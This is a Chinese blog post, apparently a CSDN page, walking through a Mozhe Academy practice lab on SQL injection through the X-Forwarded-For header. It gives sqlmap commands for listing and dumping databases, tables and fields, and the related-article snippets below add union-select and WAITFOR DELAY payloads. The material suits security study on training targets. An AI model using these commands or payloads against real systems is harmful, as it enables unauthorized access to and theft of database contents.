墨者学院-X-Forwarded-For注入漏洞实战

最新推荐文章于 2024-06-05 08:37:40 发布
最新推荐文章于 2024-06-05 08:37:40 发布
阅读量1.1k 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/85342551
版权

先尝试admin/admin看到提示框,由于我的弹框是乱码,不会解决,哪位大佬会的话麻烦评论一下

然后猜测是要用这个ip访问,后来看了别人的简书,提示内容大致是登录失败,ip已被记录,所以存在X-Forwarded-For注入

burpsuit抓包

然后保存为名为xxx.txt的文件

sqlmap进行爆破

sqlmap.py -r xxx.txt --dbs --batch

爆数据库

 

sqlmap.py -r xxx.txt -d 数据库名 --table --batch

爆表名

 

sqlmap.py -r xxx.txt -d 数据库名 -t 表名 --columns --batch

爆字段

 

sqlmap.py -r xxx.txt -d 数据库名 -t 表名 -c '字段名' --dump --batch

爆字段值

 

或许直接一句话爆破

结果到电脑用户文件夹下的.sqlmap里查看

sqlmap.py -r xxx.txt  --dump --batch

两两进行自由组合,最后登陆成功,拿到key

0ne_
关注
专栏目录
墨者学院HTTP头注入漏洞测试(X-Forwarded-for)
qq_43817824的博客
07-24 1256
打开靶场环境,查看网页源代码,发现flag.php是进入墨者的任性首页。 设置网页代理,进入墨者的任性网页,打开Burp Suite ,抓包,右键发送给repeater,自己填入X-Forwarded-For,然后判断是否可注入。 3.order by 判断表数量,最后发现是4 4.union select 1,2,3,4测试其注入点的位置是在4,通过union select 1,2,3,(...
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 3589
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
HTTP头注入漏洞测试(X-Forwarded-for)
qq_36933272的博客
09-02 334
进入墨者的任性网页,burp截取数据包,send to repeater 加入X-Forwarded-For 判断注入点 判断列数 order by N,发现表数量是4 回显,union select 1,2,3,4 显示表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables wher...
X-Forwarded-For注入漏洞实战
weixin_47493074的博客
09-21 1830
X-Forwarded-For注入漏洞
墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1368
小羊学安全 任重而道远 ~
墨者学院 ——X-Forwarded-For注入漏洞实战
知足且坚定,温柔且上进
02-09 722
前言: 小白昨天在利用sqlmap注入的时候,死活不成功(连接超时),把我搞崩溃了,今天又试了一下还是如此。 当我把小飞机(科学上网)关了,再次尝试,成功了!所以如果和我有一样状况的新手们可要注意这个问题哦。 步骤一: 利用burpsuite抓包并且发送到reperter, 添加x-forwarded-for:* 1.将Request的Raw内容复制到自己新建的一个txt文档,命名为x...
墨者学院】X-Forwarded-For注入漏洞实战
hehigoxqc606的博客
08-31 962
墨者学院】X-Forwarded-For注入漏洞实战 漏洞原理: 利用HTTP头部注入、sqlmap注入等方式,爆破数据库表中的用户账号和密码,以登陆系统,很有可能对系统有下一步的破坏。 实战过程: 第一步:访问链接 第二步:抓取数据包,可以看到登陆失败,并提示登陆的IP地址 第三步:利用X-Forwarded-For头伪装127.0.0.1进行测试 第四步:复制RAW文件到xff.txt中,这里构造的X-Forward...
墨者学院-HTTP头注入漏洞测试(X-Forwarded-for)
JimWu的博客
09-04 542
HTTP头注入漏洞测试(X-Forwarded-for) 难易程度:★★ 题目类型:WEB安全 使用工具:FireFox浏览器、burpsuite 1.打开靶场,根据题目是http头注入,打开burpsuite,点击链接,截取包。 2.send to repeater,在下方加一行X-Forwarded-For,开始注入。 3.输入1=1,go一下,返回正常页面。 4.输入union selec...
利用X-Forwarded-For进行sql注入
wqj975005563的专栏
06-06 4559
由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--String sql = "select * from ta...
[ 墨者学院 ] SQL注入 —— X-Forwarded-For注入漏洞实战
weixin_30843605的博客
06-27 466
0x00.题目描述: 背景介绍 某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标 1、掌握SQL注入的基本原理;2、了解服务器获取客户端IP的方式;3、了解SQL注入的工具使用; 解题方向 对...
01#墨者靶场-X-Forwarded-For注入漏洞实战
shy的博客
11-15 745
墨者学习01 By/shy014 1.在网站登陆处抓包,发现提示IP已被记录。...
Cookie注入和X-Forwarded-For注入
天天学安全专属博客
11-22 1114
Cookie注入和X-Forwarded-For注入,sql注入详解,最详细的sql注入方式,和sql注入语句
墨者学院 - X-Forwarded-For注入漏洞实战
多崎巡礼的博客
08-28 1474
burp抓包,将抓到数据存为  xxx.txt 爆数据库 sqlmap.py -r xxx.txt --dbs --batch 爆表名 sqlmap.py -r xxx.txt -d 数据库名 --table --batch 爆表中的字段 sqlmap.py -r xxx.txt -d 数据库名 -t 表名 --columns --batch 爆字段中的值 sqlmap.py -r ...
0x2A.HTTP头注入漏洞测试(X-Forwarded-for)
qq_31679787的博客
10-22 300
该题可以进行手注或者使用sqlmap; 首先进行手注,抓包后添加X-Forwarded-for:*'测试发现并没有报错,而且这样保存下来在sqlmap中检测也检测不到SQL注入; 修改为* or 1=1会报错,但是后续测试也会出问题,只有不添加ip地址或者*才能正常进行sql注入; 通过or 1=1检测是否能进行sql注入; 查询显示位,结果为4的时候显示正常; 通过联合查询查询...
XFF注入墨者靶场】
最新发布
qq_68163788的博客
06-05 755
X-Forwarded-For是一个HTTP请求头部信息,用于标识HTTP请求经过的代理服务器IP地址。通常情况下,当一个客户端向服务器发送请求时,服务器会将请求来源的IP地址记录在日志中,以便进行信息追踪和安全检测。 然而,当请求经过多个代理服务器时,服务器可能无法准确判断请求的真实发起者IP地址。这时就需要使用X-Forwarded-For头部信息来记录请求经过的代理服务器IP地址。
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值